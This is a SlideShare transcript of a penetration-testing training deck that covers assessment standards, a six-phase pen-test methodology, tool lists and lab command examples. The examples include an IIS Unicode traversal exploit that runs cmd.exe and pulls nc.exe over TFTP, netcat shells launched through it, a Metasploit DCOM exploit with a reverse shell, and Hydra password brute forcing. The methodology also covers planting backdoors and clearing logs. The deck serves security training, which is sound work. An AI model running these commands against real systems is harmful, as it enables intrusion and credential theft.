SlideShare a Scribd company logo
1 of 47
Program:
Certified Computer Security Analyst (CCSA)

              LSP Telematika
          Created By Semi Yulianto
                 Shared By
           Linuxer@kaskus.co.id
Semi Yulianto
MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA,
CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc 
Independent Trainer and Consultant


 EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)
Current Roles:


    ITS2 (Riyadh, Saudi Arabia)
    Senior Technical Trainer/Security Consultant


    IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)

    Security Consultant (Web Application Pen-Tester)

    Security Consultant (ESET Anti-Virus & Smart Security)


semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com
Contacts:

+62 852 1325 6600 and +60 14 9377 462
1.   Vulnerabilities by Management Categories
2.   Assessment Standards
3.   Assessment Service Definition
4.   Network Assessment Methodology
5.   Pen-Test Methodology
6.   Security Tools
7.   Investigating Vulnerabilities
OS configuration - Vulnerabilities due to improperly configured operating system
    software.




    Software maintenance - Vulnerabilities due to failure to apply patches to known
    vulnerabilities.




    Password/access control - Failure to comply with password policy and improper
    access control settings.




    Malicious software - Existence of malicious software (Trojans, worms, etc.) or
    evidence of use.




    Dangerous services - Existence of vulnerable or easily exploited services or
    processes.




    Application configuration - Vulnerabilities due to improperly configured
    applications.

The United States National Security Agency (NSA) has provided an
    NSA (US)

    INFOSEC Assessment Methodology (IAM) framework to help consultants




    and security professionals
    outside the NSA provide assessment services to clients in line with a
    recognized standard.
    http://www.iatrp.com


    The Government Communications Headquarters (GCHQ) in the United
    CESG CHECK (UK)

    Kingdom has an information assurance arm known as the Communications



    and Electronics

    security consultants outside the NSA to provide assessment services, CESG
    operates a program known as CHECK to evaluate and accredit security
    Security Group (CESG). In the same way that the NSA IAM framework allows

    testing teams within the U.K. to undertake government assessment work.
    http://www.cesg.gov.uk/site/check/index.cfm
 Assessment - Level 1 involves discovering a cooperative high-
The IAM framework defines three levels of assessment:

  level overview of the organization being assessed, including
  access to policies, procedures, and information flow. No hands-
  on network or system testing is undertaken at this level.

    Evaluation - Level 2 is a hands-on cooperative process that
    involves testing with network scanning, penetration tools, and
    the use of specific technical expertise.





    Red Team - Level 3 is non cooperative and external to the target
    network, involving penetration testing to simulate the
    appropriate adversary. IAM assessment is on intrusive, so within




    this framework, a Level 3 assessment involves full qualification
    of vulnerabilities.
1. Use of DNS information retrieval tools for both single and
The CESG CHECK network security assessment as:

   multiple records, including an understanding of DNS record
   structure relating to target hosts.
2. Use of ICMP, TCP, and UDP network mapping and probing tools

3. Demonstration of TCP service banner grabbing.

4. Information retrieval using SNMP, including an understanding
   of MIB structure relating to target system configuration and
   network routes.
5. Understanding of common weaknesses in routers and switches
   relating to Telnet, HTTP, SNMP, and TFTP access and
   configuration.
1. User enumeration via finger, rusers, rwho, and SMTP
CESG CHECK Unix-specific competencies:

   techniques
2. Use of tools to enumerate Remote Procedure Call (RPC)
   services and demonstrate an understanding of the security
   implications associated with those services.
3. Demonstration of testing for Network File System (NFS)
   weaknesses.
4. Testing for weaknesses within r-services (rsh, rexec, and
   rlogin).
5. Detection of insecure X Windows servers.

6. Testing for weaknesses within web, FTP, and Samba services.
1. Assessment of NetBIOS and CIFS services to enumerate
CESG CHECK Windows NT-specific competencies:

   users, groups, shares, domains, domain controllers,
   password policies, and associated weaknesses.
2. Username and password grinding via NetBIOS and CIFS
   services.
3. Detecting and demonstrating presence of known security
   weaknesses within.
4. Internet Information Server (IIS) web and FTP service
   components, and Microsoft SQL Server.
 ISECOM’s Open Source Security Testing Methodology
Other Assessment Standards & Associations:

  Manual (OSSTMM)
  http://www.osstmm.org
 Council of Registered Ethical Security Testers (CREST)
  http://www.crestapproved.com
 TIGER Scheme
  http://www.tigerscheme.org
 EC-Council’s Certified Ethical Hacker (CEH)
  http://www.eccouncil.org/CEH.htm
 Open Source Web Application Security Project (OWASP)
  http://www.owasp.org
1.   Vulnerability Scanning
2.   Network Security Assessment
3.   Web Application Testing
4.   Penetration Testing
5.   Onsite Audit
Uses automated systems (such as Nessus, ISS Internet
    Vulnerability Scanning

    Scanner, QualysGuard, or eEye Retina) with minimal




    hands-on qualification and assessment of
    vulnerabilities. This is an inexpensive way to ensure that
    no obvious vulnerabilities exist, but it doesn’t provide a
    clear strategy to improve security.


    An effective blend of automated and hands-on manual
    Network Security Assessment

    vulnerability testing and qualification. The report is




    usually handwritten, accurate, and concise, giving
    practical advice that can improve a company’s security.
Involves post-authentication assessment of web application
    Web Application Testing

    components, identifying command injection, poor




    permissions, and other weaknesses within a given web
    application. Testing at this level involves extensive manual
    qualification and consultant involvement, and it cannot be
    easily automated.


    Involves multiple attack vectors (e.g., telephone war dialing,
    Penetration Testing

    social engineering, and wireless testing) to compromise the




    target environment. It demonstrates and discusses the
    methodologies adopted by determined Internet-based
    attackers to compromise IP networks remotely, which in turn
    will allow you to improve IP network security.
Provides the clearest picture of network security.
   Onsite Audition

    Consultants have local system access and run tools
    on each system capable of identifying anything
    untoward, including rootkits, weak user passwords,
    poor permissions, and other issues. 802.11 wireless
    testing is often performed as part of onsite auditing.
1. Network reconnaissance to identify IP networks
High-level components of Network Assessment:

   and hosts of interest.
2. Bulk network scanning and probing to identify
   potentially vulnerable hosts.
3. Investigation of vulnerabilities and further network
   probing by hand.
4. Exploitation of vulnerabilities and circumvention of
   security mechanisms.
1.   Information Gathering
2.   Service Enumeration
3.   Vulnerability Identification
4.   Penetration
5.   Maintaining Access
6.   Housekeeping
The objective of information gathering is to find as
   Information Gathering

    many information as possible about the target of
    evaluation by using passive (Google, Whois, WWW)
    or active (social engineering) information gathering.



    Involves launching network and port scanning to
   Service Enumeration

    find open, filtered ports and services running on a
    specific port.
Involves finding new and currently available
   Vulnerability Identification

    vulnerability on the operating systems, applications
    and/or services (manual or automated).



    Involves active penetration on a specific target of
   Penetration

    evaluation by exploiting any new or known
    vulnerability.
Involves uploading trojan or backdoor with the
    Maintaining Access

    objective to make it easier to go in and out from a




    target of evaluation without having to do the
    exploitation and ensure that the activities are not
    being noticed.


    Clearning up to cover tracks. Involves disabling
    Housekeeping

    audit settings and clearing or altering log files




    (system, security and application).
1. Nmap (http://www.insecure.org)
Scanning Tools:

2. Nessus (http://www.nessus.org)
3. ISS Internet Scanner (http://www.iss.net)
4. eEye Retina (http://www.eeye.com)
5. QualysGuard (http://www.qualys.com)
6. Matta Colossus (http://www.trustmatta.com)
1. Metasploit Framework
Exploitation Frameworks:

   (http://www.metasploit.com)
2. Core IMPACT (http://www.coresecurity.com)
3. Immunity CANVAS
   (http://www.immunityinc.com/products-
   canvas.shtml)
1. Paros (http://www.parosproxy.org)
Proxy-based web application testing tools:

2. WebScarab
   http://www.owasp.org/index.php/Category:OWAS
   P_WebScarab_Project)
3. Burp suite (http://portswigger.net)
1. Wapiti (http://wapiti.sourceforge.net)
Active web application crawling and fuzzing tools:

2. Nikto (http://www.cirt.net/code/nikto.shtml)
1. Acunetix Web Vulnerability Scanner
Web Application Scanning Tools:

   (http://www.acunetix.com)
2. Watchfire AppScan
   (http://www.watchfire.com/products/appscan/)
3. SPI Dynamics WebInspect
   (http://www.spidynamics.com/products/webinspe
   ct/)
4. Cenzic Hailstorm
   (http://www.cenzic.com/products_services/cenzic
   _hailstorm.php)
1. Securiteam (http://www.securiteam.com)
Useful Websites:

2. SecurityFocus (http://www.securityfocus.com)
3. milw0rm (http://www.milw0rm.com)
4. Offensive Security Exploit DB (http://www.exploit-db.com)
5. Packet Storm (http://www.packetstormsecurity.org)
6. FrSIRT (http://www.frsirt.com)
7. MITRE Corporation CVE (http://cve.mitre.org)
8. NIST National Vulnerability Database (http://nvd.nist.gov)
9. ISS X-Force (http://xforce.iss.net)
10. CERT vulnerability notes (http://www.kb.cert.org/vuls)
11. eEye Preview (http://research.eeye.com/html/services)
12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com)
13. VeriSign iDefense Security Intelligence Services
    (http://labs.idefense.com/services)
1.    Information Gathering
2.    Service Identification
3.    Vulnerability Identification
4.    Penetration (Exploitation)
5.    Maintaining Access
6.    Housekeeping (Covering Tracks)
7.    Password Cracking
8.    Client-Side Hacking
9.    Web Application Hacking
10.   Denial-of-Service (DoS) Attacks
11.   Sniffing and ARP Spoofing
12.   Wireless Hacking
13.   Linux Hacking
14.   Analyzing Attack Signatures with IDS and Sniffer
15.   Evading IDS and Firewall
IIS Unicode Directory Traversal Exploit
 Syntax:
  nc –v <target_ip> <http_port>
  GET
  http://<target_ip>/scripts/<unicode_string
  s>/<windows_dir>/cmd.exe?/c+<command>

   Example:
    nc –v 131.107.1.101 80
    GET
    http://131.107.1.101/scripts/..%255c../win
    nt/system32/cmd.exe?/c+dir
TFTP (Trivial File Transfer Protocol)

Upload and Download
 Syntax:
  tftp –i <localhost_ip> GET <file>
  tftp –i <localhost_ip> PUT <file>

   Example:
    tftp –i 131.107.1.252 GET nc.exe
    tftp –i 131.107.1.101 PUT nc.exe

   Unicode Examples:
    GET
    http://131.107.1.101/scripts/..%255c../winnt/syste
    m32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Netcat (Network Swiss Army Knife)

Server Mode (listening/reverse TCP)
 Syntax:
  nc –v –l –p <port_to_listen_to>
  nc –vlp <port_to_listen_to>

   Example:
    nc –v –l –p 555
    nc –vlp 555
Netcat (Network Swiss Army Knife)

Client Mode (connecting/bind TCP)
 Syntax:
  nc –v <target_ip> <target_port>

   Example:
    nc –v 131.107.1.101 555
Netcat (Network Swiss Army Knife)

Server Mode (listening/reverse TCP)
 Syntax:
  nc –v –l –p <listening_port>

   Unicode Syntax:
    GET
    http://<target_ip>/scripts/<unicode_strings>/<wind
    ows_dir>/cmd.exe?/c+<command>

   Example:
    GET
    http://131.107.1.101/scripts/..%255c../winnt/syste
    m32/cmd.exe?/c+nc+-v+-l+-p+5555
Netcat (Network Swiss Army Knife)

Client Mode (connecting/bind TCP)
 Syntax:
  nc –v <target_ip> <target_port>

   Unicode Syntax:
    GET
    http://<target_ip>/scripts/<unicode_strings>/<wind
    ows_dir>/cmd.exe?/c+<command>

   Example:
    GET
    http://131.107.1.101/scripts/..%255c../winnt/syste
    m32/cmd.exe?/c+nc+-v+131.107.1.252+555
Nmap (Ping Sweep/Network Scan)
 Syntax:
  nmap –sP <network_id>

   Example:
    nmap –sP 131.107.1.0/24

Nmap (Port Scan)
 Syntax:
  nmap <target_ip>

   Example:
    nmap 131.107.1.101
Nmap (Port Scan with Options)
 Syntax:
    nmap <option> <target_ip>


   Examples:
    nmap   –sS –sV –O 131.107.1.101
    nmap   –sS –sV –p80,443 –O 131.107.1.101
    nmap   –sS –sV –p80,443 –O –T4 131.107.1.101
    nmap   –sS –sV –p80,443 –O –T4 –PN 131.107.1.101
    nmap   –sU –sV –O 131.107.1.101
    nmap   –A 131.107.1.101
Nmap (Enumeration)
   Syntax:
    nmap <option> <script> <target_ip>

   Examples:
    nmap –sS    –script=smb-enum-users 131.107.1.101
    nmap –sS    –script=smb-enum-shares 131.107.1.101
    nmap –sS    –script=smb-enum-domains 131.107.1.101
    nmap –sS    –script=smb-enum-processes 131.107.1.101
    nmap –sS    –script=smb-enum-security 131.107.1.101
Metasploit Framework Exploit Module (MSFConsole)

    cd /pentest/exploits/msf3
    ./msfconsole

   Syntax:
    msf >     help
    msf >     show exploits
    msf >     use <exploit_module>
    msf >     show payloads
    msf >     set PAYLOAD <payload_type>
    msf >     show options
    msf >     set RHOST <target_ip>
    msf >     set LHOST <localhost_ip>
    msf >     set LPORT <local_port>
    msf >     set RPORT <remote_port>
    msf >     show targets
    msf >     set TARGET <target_id>
    msf >     exploit
Metasploit Framework Exploit Module (MSFConsole)

    cd /pentest/exploits/msf3
    ./msfconsole

   Example:
    msf > help
    msf > show exploits
    msf > use windows/dcerpc/ms03_026_dcom
    msf > show payloads
    msf > set PAYLOAD windows/shell/reverse_tcp
    msf > show options
    msf > set RHOST 131.107.1.101
    msf > set LHOST 131.107.1.252
    msf > set LPORT 5555
    msf > set RPORT 1234
    msf > show targets
    msf > set TARGET 0
    msf > exploit
Metasploit Framework Auxiliary Module

    cd /pentest/exploits/msf3
    ./msfconsole

   Syntax:
    msf >     help
    msf >     show auxiliary
    msf >     use <auxiliary_module>
    msf >     set RHOSTS <target_ip_or_network_id>
    msf >     run
Metasploit Framework Auxiliary Module

    cd /pentest/exploits/msf3
    ./msfconsole

   Example 1:
    msf > help
    msf > show auxiliary
    msf > use scanner/smb/smb_version
    msf > set RHOSTS 131.107.1.101
    msf > run

   Example 2:
    msf > help
    msf > show auxiliary
    msf > use scanner/smb/smb_version
    msf > set RHOSTS 131.107.1.0/24
    msf > run
Metasploit Framework Exploit Module (MSFCLI)

    cd /pentest/exploits/msf3

   Syntax:
    ./msfcli <exploit_module> <payload_type>
    <options> E

   Example:
    ./msfcli windows/dcerpc/ms03_026_dcom
      PAYLOAD=windows/shell/bind_tcp
      RHOST=131.107.1.101 E
THC Hydra (Dictionary-based Password Cracking)

    cd /tmp

   Syntax:
    ./hydra –L <users_file> -P <passwords_file>
    <target_ip> <service_type>

   Examples:
    ./hydra –L   login.txt   –P   pass.txt   131.107.1.101   ftp
    ./hydra –L   login.txt   –P   pass.txt   131.107.1.101   smb
    ./hydra –L   login.txt   –P   pass.txt   131.107.1.101   mssql
    ./hydra –L   login.txt   –P   pass.txt   131.107.1.101   rpc
Nikto (Web Application Vulnerability Scanner)

    cd /pentest/nikto

   Syntax:
    ./nikto.pl –host <target_ip>

   Example:
    ./nikto.pl –host 131.107.1.101

More Related Content

What's hot

Wireless Networking
Wireless NetworkingWireless Networking
Wireless NetworkingGulshanAra14
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture NotesFellowBuddy.com
 
Ancaman & kelemahan server
Ancaman & kelemahan serverAncaman & kelemahan server
Ancaman & kelemahan serverDedi Dwianto
 
Network security
Network securityNetwork security
Network securityAli Kamil
 
امن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتامن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتAmr Rashed
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic conceptsKhoa Nguyen
 
What is Network Security?
What is Network Security?What is Network Security?
What is Network Security?Faith Zeller
 
Ne Course Part Two
Ne Course Part TwoNe Course Part Two
Ne Course Part Twobackdoor
 
Network Security Chapter 7
Network Security Chapter 7Network Security Chapter 7
Network Security Chapter 7AfiqEfendy Zaen
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and youArt Ocain
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
Network security presentation
Network security presentationNetwork security presentation
Network security presentationKudzai Rerayi
 
Network Security
Network SecurityNetwork Security
Network Securityforpalmigho
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeIkhtiar Khan Sohan
 

What's hot (20)

Network security ppt
Network security pptNetwork security ppt
Network security ppt
 
Wireless Networking
Wireless NetworkingWireless Networking
Wireless Networking
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture Notes
 
Network security
Network securityNetwork security
Network security
 
Network security
Network securityNetwork security
Network security
 
Ancaman & kelemahan server
Ancaman & kelemahan serverAncaman & kelemahan server
Ancaman & kelemahan server
 
Network security
Network securityNetwork security
Network security
 
امن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتامن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكات
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic concepts
 
What is Network Security?
What is Network Security?What is Network Security?
What is Network Security?
 
Ne Course Part Two
Ne Course Part TwoNe Course Part Two
Ne Course Part Two
 
Network security
 Network security Network security
Network security
 
Network Security Chapter 7
Network Security Chapter 7Network Security Chapter 7
Network Security Chapter 7
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and you
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
Network security presentation
Network security presentationNetwork security presentation
Network security presentation
 
Computer security
Computer securityComputer security
Computer security
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Network Security
Network SecurityNetwork Security
Network Security
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and Challenge
 

Viewers also liked

Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security PresentationAllan Pratt MBA
 
Virtual host and certificate authority
Virtual host and certificate authorityVirtual host and certificate authority
Virtual host and certificate authorityAhmad Sayuti
 
Curriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi PrayitnoCurriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi PrayitnoAdi Prayitno
 
Bastion host topologi jaringan
Bastion host topologi jaringanBastion host topologi jaringan
Bastion host topologi jaringanMunir Putra
 
Setting local domain di virtual host
Setting local domain di virtual hostSetting local domain di virtual host
Setting local domain di virtual hostFgroupIndonesia
 
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik osModul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik osEen Pahlefi
 
Presentation Progress TA
Presentation Progress TA Presentation Progress TA
Presentation Progress TA Arif Wahyudi
 
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...Een Pahlefi
 
MUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystMUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystFajar Nugroho
 
Konfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDSKonfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDSmfaad
 
Konfigurasi dasar Cisco Router
Konfigurasi dasar Cisco RouterKonfigurasi dasar Cisco Router
Konfigurasi dasar Cisco RouterAldi Nor Fahrudin
 
Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015Dedi Dwianto
 
Application Security Trends and Issues
Application Security Trends and IssuesApplication Security Trends and Issues
Application Security Trends and IssuesDedi Dwianto
 
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...idsecconf
 

Viewers also liked (20)

Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security Presentation
 
Network security
Network securityNetwork security
Network security
 
Virtual host and certificate authority
Virtual host and certificate authorityVirtual host and certificate authority
Virtual host and certificate authority
 
Curriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi PrayitnoCurriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi Prayitno
 
Bastion host topologi jaringan
Bastion host topologi jaringanBastion host topologi jaringan
Bastion host topologi jaringan
 
Networking recap
Networking recapNetworking recap
Networking recap
 
Setting local domain di virtual host
Setting local domain di virtual hostSetting local domain di virtual host
Setting local domain di virtual host
 
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik osModul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
 
Presentation Progress TA
Presentation Progress TA Presentation Progress TA
Presentation Progress TA
 
Sosialisasi kurikulum 2016
Sosialisasi kurikulum 2016Sosialisasi kurikulum 2016
Sosialisasi kurikulum 2016
 
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
 
Trouble shooting windows
Trouble shooting windowsTrouble shooting windows
Trouble shooting windows
 
MUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystMUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration Analyst
 
Konfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDSKonfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDS
 
Konfigurasi dasar Cisco Router
Konfigurasi dasar Cisco RouterKonfigurasi dasar Cisco Router
Konfigurasi dasar Cisco Router
 
Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015
 
Application Security Trends and Issues
Application Security Trends and IssuesApplication Security Trends and Issues
Application Security Trends and Issues
 
Pendampingan HelpDesk
Pendampingan HelpDeskPendampingan HelpDesk
Pendampingan HelpDesk
 
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
 
Mengenal Internet Security
Mengenal Internet SecurityMengenal Internet Security
Mengenal Internet Security
 

Similar to NSA and PT

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfAmeliaJonas2
 
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...AM Publications
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET Journal
 
AKS IT Corporate Presentation
AKS IT Corporate PresentationAKS IT Corporate Presentation
AKS IT Corporate Presentationaksit_services
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxAfour tech
 
Infrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration TestingInfrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration TestingElanusTechnologies
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and PatchingEmmanuel Udeagha B.
 
What is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdfWhat is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdfElanusTechnologies
 
Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51martinvoelk
 
Phi 235 social media security users guide presentation
Phi 235 social media security users guide presentationPhi 235 social media security users guide presentation
Phi 235 social media security users guide presentationAlan Holyoke
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Indexing Building Evaluation Criteria
Indexing Building Evaluation CriteriaIndexing Building Evaluation Criteria
Indexing Building Evaluation CriteriaIJERA Editor
 
IRJET- Cross Platform Penetration Testing Suite
IRJET-  	  Cross Platform Penetration Testing SuiteIRJET-  	  Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing SuiteIRJET Journal
 
Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Laura Arrigo
 
Cst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comCst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comamaranthbeg113
 
Cst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comCst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comamaranthbeg53
 
Cst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.comCst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.comamaranthbeg73
 

Similar to NSA and PT (20)

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdf
 
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
 
Aksit profile final
Aksit profile finalAksit profile final
Aksit profile final
 
AKS IT Corporate Presentation
AKS IT Corporate PresentationAKS IT Corporate Presentation
AKS IT Corporate Presentation
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docx
 
Infrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration TestingInfrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration Testing
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and Patching
 
What is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdfWhat is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdf
 
Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51
 
Phi 235 social media security users guide presentation
Phi 235 social media security users guide presentationPhi 235 social media security users guide presentation
Phi 235 social media security users guide presentation
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Types of Vulnerability Scanning An in depth investigation.pdf
Types of Vulnerability Scanning An in depth investigation.pdfTypes of Vulnerability Scanning An in depth investigation.pdf
Types of Vulnerability Scanning An in depth investigation.pdf
 
Indexing Building Evaluation Criteria
Indexing Building Evaluation CriteriaIndexing Building Evaluation Criteria
Indexing Building Evaluation Criteria
 
IRJET- Cross Platform Penetration Testing Suite
IRJET-  	  Cross Platform Penetration Testing SuiteIRJET-  	  Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing Suite
 
Introduction to security testing raj
Introduction to security testing rajIntroduction to security testing raj
Introduction to security testing raj
 
Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12
 
Cst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comCst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.com
 
Cst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comCst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.com
 
Cst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.comCst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.com
 

Recently uploaded

31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...Nguyen Thanh Tu Collection
 
MS4 level being good citizen -imperative- (1) (1).pdf
MS4 level   being good citizen -imperative- (1) (1).pdfMS4 level   being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdfMr Bounab Samir
 
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
